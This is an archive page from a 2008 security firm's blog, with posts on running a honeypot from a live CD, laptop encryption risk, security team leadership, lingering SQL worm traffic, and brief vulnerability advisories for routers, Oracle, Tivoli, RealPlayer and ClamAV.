Laying the Trap with HoneyPoint Personal Edition & Puppy Linux Live CD

Posted on February 27, 2008 by Brent Huston

Recently, I have been capturing quite a bit of attacker probes and malware signatures using a very simple (and cheap) combination of HoneyPoint Personal Edition (HPPE) and a Puppy Linux Live CD. My current setup is using an old Gateway 333MHz Pentium Laptop from the late 90’s!

The beauty of this installation is that it lets me leverage all of the ease of a Live CD with the power and flexibility of HPPE. It also breathes new usefulness into old machines from our grave yard.

So, here is how it works. I first boot the machine from the Puppy Live CD and configure the network card. From my FTP server (or a USB key) I download the binary for HPPE Linux (available to licensed HPPE users by request), the license and my existing config file. That’s it – run the binary and click Start. Now I am set to trap attack probes and malware to my heart’s content!

It really is pretty easy and the new email alerting now built into HPPE allows me to remotely monitor them as well from my iPhone email. This makes a nice, easy, quick way to throw up HoneyPoints without needing a separate console or a centralized monitoring point.

This setup is very useful to me and has even got me thinking about adding a plugin interface to HPPE in future releases. That would essentially give you the power to write custom alerting mechanisms and even fingerprinting tools for attacking systems.

Give this setup a try and be sure to let me know your thoughts on HPPE. As always, MSI really wants to hear your ideas, input and feedback on our work.

Thanks for reading and have fun capturing attack data. Some of this stuff is pretty darn cool! 😉

Incident Reporting & Handling WorkFlows

Posted on February 26, 2008 by Brent Huston

I had an interesting conversation with a client today and they are planning to implement a web site that would give their internal employees a centralized resource for looking up how to report security incidents, building/facilities issues, HR problems, policy violations, etc.

They picture this as a web page with a list of phone numbers, intranet applications and other contact mechanisms for their staff to use to report issues. The conversation was around attempting to create a workflow or flowchart for decision making about how to report an issue and how to decide which contact method to use.

I know a few other organizations have created formal incident reporting and such for their employees. Would anyone care to share their decision trees or the like for incident handling and user training around this topic (sanitized, of course!)?

Thanks, in advance, for any insight on this. The client will be monitoring the thread and it may help others as well.

Risk Increase in Laptop Loss with Encryption?

Posted on February 26, 2008 by Brent Huston

There has been a bunch of buzz in the last few days about researchers who figured out how to retrieve crypto keys from RAM on stolen laptops. Several analysts have talked about this raising the risk for data loss from laptop theft and some are even questioning the effectiveness of crypto as a control. I think that much of this is hype and will prove to be overblown in the coming months.

First, the attack has some difficulty and knowledge requirements. This essentially makes it equivalent to a forensic technique and as such is well beyond the capabilities of basic attackers. It requires knowledge deeper than an average computer user or power user would possess. While this does not eliminate the risk, it does significantly reduce the pool of attackers capable of exploiting the vulnerability. Further risk reductions could be gained by understanding that the attackers must gain access to the device (what controls are in place for this?, what training have you done on laptop loss control?) and the device must be in a sleep state or recently powered down (have you taught users to power down laptops completely when removing them from the office or other controlled areas?). Each step in training and additional controls further serves to reduce the risks from this vulnerability.

Vendors are also reacting to the problem. Many are identifying the key management processes in their products and moving to change them in such a way as to make them more effective with this attack in mind. Their results and effectiveness are likely to vary, but at least many of them are trying.

So, while laptop loss remains a potential data theft risk, even with crypto in place, it is likely to remain a manageable and acceptable risk if proper awareness controls are in place. So before you put too much stock in some of the “near panic” FUD levels some security analysts are shouting, step back, take a look at it from a rational risk standpoint and then identify what you can do about it.

This issue again reinforces that there aren’t any silver bullets in security. Nothing is “absolute protection”, even high level math. The only real way to do security is through proper, rational risk management…

Security Team Leadership Matters

Posted on February 21, 2008 by Brent Huston

Leading a team of security technicians can be a tough job, but in most corporations the manager of the team must also be an evangelist. The task of leading a security team often requires that the leader have a vision of the goals of the team and is capable of “selling” that vision both to upper management and the user base of the entire organization. Since many teams are led by technicians who have ascended through the ranks, they often have limited understanding of management needs and marketing approaches.

If you are such a security manager, here are a few tips to help you get started. The first one is a quick list of required reading. Leading the team means being a management consultant and an evangelist. To help strengthen or develop these skills, check out a couple of these titles:

The Macintosh Way by Guy Kawasaki – this is the Bible of evangelism from one of the greatest evangelists of the silicon age

The Idea Virus by Seth Godin – this book’s insight is the basis for viral marketing and can be a powerful tool for selling ideas inside of an organization, all of Seth’s work is great and could be helpful

A book about corporate structure and management goals – these are easy to come by and can vary by industry and organization type but a quick Amazon.com search is likely to reveal several that fit the needs

It is essential and critical that security team managers and leaders come up to speed on the needs and goals of management. It should be an immediate goal to learn the style and language of your management team. Only when you can act as a liaison and converse with them on their own terms can you begin the process of “selling” them on the security plan and process. Only when you understand them and have earned their trust can you begin to align security operations with the various lines of business and move further towards adding perceived value to their bottom line.

SQL Worms Continue to Raise Their Ugly Heads

Posted on February 5, 2008 by Brent Huston

For the last few weeks I have been watching old versions of SQL attacks, worms and probes continue to circulate around the Internet. For a year or so now, I have continued to be fascinated by the life span of old attacks and worms. I have written a couple of articles about how our HoneyPoints continue to capture both NIMDA and Code Red worm traffic.

The thing about these SQL worms is that their traffic is so large, even today. According to popular sources like ATLAS, they represent nearly 70% of all malicious traffic on the Internet today. 70% is a large number, especially for vulnerabilities that date back to 2002. Here we are more than 5 years later and these threats are still propagating!

Port UDP/1434 is still the most commonly threatened port according to ATLAS, which I find hard to believe. Our HoneyPoint experience shows that ports 25 and 80 are the most frequently attacked, unless you add in the myriad of Windows RPC noise you get on the Windows SMB and RPC ports. Maybe ATLAS does not include spam or PHP probes in their attack statistics?

While I am unsure of the frequency of global 1434 attacks, it is very true that the traffic is still around. Our HoneyPoints often detect Slammer worm activity and illicit SQL probes from the Internet. These probes originate from all around the world and no particular region seems to emerge as the most common, though we should study these frequency statistics more deeply when time allows.

But what of targets? How many SQL server instances are still exposed to the raw Internet? Our assessment technicians say they almost never run into one in corporate environments today. I suppose that they still exist in more than a few cable modem or other systems without proper firewalls, but certainly the availability of SQL services to the raw Internet has to have dwindled to almost none. If that is true, then why all the scanning activity?

I have made a few attempts to backtrack hosts that perform the scans and at first blush many show the signs of common bot-net infections. Most are not running exposed SQL themselves, so that means that the code has likely been implemented into many bot-net exploitation frameworks. Perhaps the bot masters have the idea that when they infiltrate a commercial network, the SQL exploits will be available and useful to them? My assessment team says this is pretty true. Even today, they find blank “sa” passwords and other age old SQL issues inside major corporate clients. So perhaps, that is why these old exploits continue to thrive.

In either case, significant efforts should be made to reduce or eliminate these older vulnerabilities and to remove them from our current threats that we face today. So long as we have this noisy attack traffic from the past circulating, it makes it even harder for us to focus on emerging threats and risks that affect our Internet facing systems today. It is simply one more set of alerts, log entries and intrusion deception emails to sort through…

Level One WBR-3460A Wireless Router Telnet Vulnerability

Posted on January 11, 2008 by wstoner

This device presents a telnet prompt on the standard port (23/tcp). This instance of telnet allows local users to login without authenticating. This gives the user access to the file system where they are able to manipulate files or grab the administrator password for the web interface. A fix is in development.

Oracle Prerelease Info, Tivoli Bof

Posted on January 9, 2008 by Nathan Grandbois

There’s a vulnerability in Oracle Siebel SimBuilder that could allow for remote system compromise. This vulnerability is related to a vulnerability in NCTAudioFile2.dll. The vulnerability affects version version 7.8.5 build 2635. Other version have not been tested so they may be vulnerable as well. Users should disable the affected ActiveX control. If you are affected by this and would like more information please feel free to contact us.
Tivoli Storage Manager Express is vulnerable to a heap based buffer overflow. This can be exploited by a malicious user on the network to cause code execution under the SYSTEM user. Versions of the software prior to 5.3.7.3 are affected. Administrators of this software should apply the updates available at ftp://service.boulder.ibm.com/storage/tivoli-storage-management/patches/express/NT/5.3.7.3/
Also, Oracle will be releasing critical patch updates Tuesday, January 15th. Several critical vulnerabilities in database software and application servers are expected to be announced. We will provide more details as they are made available.

SQL Worm, MBR Rootkit

Posted on January 8, 2008 by Nathan Grandbois

There is a SQL “worm” spreading through the internet taking advantage of sites vulnerable to SQL injection attacks. The attack injects javascript in to all fields in the database that attempts to exploit browser flaws on clients that visit the infected website. Web developers should be aware of the increasing attacks using input validation errors as their attack vector.

We have received word of a working MBR rootkit that works on modern systems. Not a new concept, but one that hasn’t had attention for several years. Windows Vista allows users to edit the MBR from userland. A MBR rootkit has been discovered in the wild at the end of 2007. Keep an eye on this for more information coming in the future.

Three Examples of Thinking Differently About InfoSec

Posted on January 3, 2008 by Brent Huston

Today, I am putting my money where my mouth is. I have been talking about thinking differently about infosec as being a powerful tool in the future for several months now, but here are three concrete examples of how security folks need to think differently than they do today. (Note that some of you may have already begun to embrace these ideas – if so, awesome, you are ahead of the curve!)

#1 – Think like attackers AND defenders – We as infosec folks often get so caught up in our statements of ethics, credos and agreements about behavior that we get trapped inside them and become blind to the methods and ways of attackers. Many security folks I meet have taken such steps to distance themselves from attackers and they often show utter disdain for attackers, tools and techniques that they are essentially blind to the way attackers think. This is a dangerous paradox. If you don’t understand your opposition, you have no way of being effective in measuring your defensive capabilities. If you can’t think like an attacker, maneuver like an attacker and understand that they are not bound by the rules that you attempt to impose on them – then you will likely have little success in defending your organization against them. To better defend our assets, we have to be able and willing to understand our enemies. We have to have a realistic knowledge and capability to replicate, at the very least, their basic tools, techniques and attitudes. Otherwise, we are simply guessing at their next move. Essentially without insight and understanding, we are playing the “security lottery” in hopes of hitting the big defensive jackpot!

#2 – Deeper defenses are better defenses – We must extend defense in depth beyond an organizational approach to a data-centric approach. The closer to the data the controls are implemented, the more likely they are to be able to add security to the core critical data. (Of course, normal rationality applies here. The controls have to be rational, effective and properly implemented and managed – as always!) This is why security mechanisms like enclaving, data classification and eventually tagging are the future of enterprise security. If we start to think about our security postures, deployments and architectures with these ideas in mind today, we will be able to leverage them in their present state and eventually gain the maximum from them when they are fully ready for integration.

#3 – Think risk, not compliance – I am going to continue to talk about this, no matter how much heat I get from the “compliance guru set”. Striving for compliance with various regulations or standards is striving for the minimum. Guidance, regulations and law are meant to be the MINIMUM BASELINE for the work we need to do to separate liability from negligence. Compliance is a milestone, not a goal. Effective understanding and management of risk is the goal. Don’t be deceived by the “compliance guru set’s” argument that meeting baselines if effective risk management. It is NOT. Regulatory compliance, ISO/PCI compliance pays little attention to and has little management for attacker techniques like vulnerability chaining, management/analysis of cascading failures or zero-day/black swan (Thanks, Alex!) evolutionary capabilities. This step requires upper management education and awareness as well, since those that control the budgets must come to see compliance as a mile marker and not the end of the race ribbon!

I hope this helps folks understand more about what I am saying when I assert than in 2008, we have to think differently if we want infosec to improve. Of course, thought has to precede action, but action is also required if we are going to change things. What is clear, from the problems of 2007 and further back, is that what we are doing now is NOT WORKING. It should be very clear to all infosec practitioners that we are losing the race between us at attackers!

RealPlayer, ClamAV, Nugache

Posted on January 2, 2008 by Nathan Grandbois

There’s a buffer overflow in RealPlayer 11. We don’t have much detail at this time, however it is reported that this can be exploited with a maliciously crafted file opened with a vulnerable version. Opening a malicious file will result in the execution of code under the context of the user running the application. The issue is reported in RealPlayer 11, other untested version may be vulnerable.

ClamAV version 0.92 contains multiple vulnerabilities. The first vulnerability is a race condition, where an attacker could generate a file with a specific name that would be called by a ClamAV function. This could allow the attacker to overwrite arbitrary files. The next issue is in the handling Base64-UUEncoded files. Attackers can create certain packed files that can bypass the scanner itself. The consequences of this should be self evident, and the possibility to occur is very real, due to the success rate of socially engineered emails and links.

More articles are emerging on the Nugache Trojan. Briefly, the Nugache Trojan is a very sophisticated piece of P2P controlled malware. Using decentralized management, nodes that can attach/detach, and encryption, this malware is a professional job. The authors of these articles seem to feel that the Storm and Nugache authors are the same, or share similar tactics. Once we see a full write up, we’ll post the details.

MSI :: State of Security

Insight from the Information Security Experts

Category Archives: General InfoSec